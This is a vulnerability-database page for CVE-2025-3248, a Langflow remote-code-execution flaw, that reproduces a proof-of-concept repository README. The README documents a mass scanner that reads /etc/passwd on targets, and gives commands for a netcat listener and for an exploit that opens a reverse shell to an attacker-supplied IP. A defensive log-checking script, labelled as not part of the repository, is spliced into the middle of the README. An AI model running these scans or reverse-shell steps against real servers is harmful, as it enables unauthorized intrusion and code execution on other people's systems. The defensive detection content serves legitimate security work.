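Related vulnerability
Title:
Langflow security vulnerability
(CVE-2025-3248)
Description: Langflow is an open-source visual framework from Langflow for building multi-agent and RAG applications. Versions of Langflow before 1.3.0 contain a security vulnerability caused by a code injection flaw in the /api/v1/validate/code endpoint, which may allow a remote, unauthenticated attacker to execute arbitrary code.
Introduction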
# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)
This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.
## Summary
**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.

---
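For defenders, a log check for the endpoint named above, as an added example that is not part of this repository: it flags POST requests to `/api/v1/validate/code` in reverse-proxy access logs and tests a version string against the 1.3.0 fix boundary. The Combined Log Format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

ENDPOINT = "/api/v1/validate/code"  # endpoint named in the advisory
FIXED_VERSION = (1, 3, 0)           # page: versions before 1.3.0 are affected

# Combined Log Format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_affected(version: str) -> bool:
    """True if a plain dotted numeric version (X.Y or X.Y.Z) is older than 1.3.0."""
    nums = [int(p) for p in version.split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums))) < FIXED_VERSION

def find_validate_code_posts(lines):
    """Group POSTs to the validate/code endpoint by client address."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")  # ignore query, trailing slash
        if path == ENDPOINT:
            hits[m["client"]].append((m["ts"], int(m["status"])))
    return dict(hits)

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2025:08:01:12 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 153 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [10/Apr/2025:08:01:15 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 200 153 "-" "python-requests/2.31.0"',
    '203.0.113.20 - - [10/Apr/2025:08:02:40 +0000] "GET /api/v1/validate/code HTTP/1.1" 405 31 "-" "curl/8.5.0"',
    '203.0.113.20 - - [10/Apr/2025:08:03:02 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 403 40 "-" "curl/8.5.0"',
    '192.0.2.44 - - [10/Apr/2025:08:05:00 +0000] "POST /api/v1/flows HTTP/1.1" 201 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, events in find_validate_code_posts(SAMPLE_LOG).items():
        served = sum(1 for _, status in events if status == 200)
        print(f"{client}: {len(events)} POST(s) to {ENDPOINT}, {served} returned 200")
```

Any hit against an instance for which `is_affected` returns true is worth reviewing alongside the host's process and outbound-connection telemetry for the same timestamps.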
## Files
### `LangflowCheck.py`
- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.
### `exploit.py`
- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.
---
## Usage
### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL:
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
```

Multiple targets:
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```

### 3. Exploit a Target
First, start a listener:
```bash
sudo nc -nvlp 4444
```

Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```

You should receive a shell if the target is vulnerable.

## ⚠️ Disclaimer
This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.

---
## Official Channels
- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
File snapshot
[4.0K] /data/pocs/ae9c93aa3307fad013efffdd37bef531a76a1dc5
├── [3.3K] exploit.py
├── [3.3K] LangflowCheck.py
└── [2.2K] README.md
0 directories, 3 files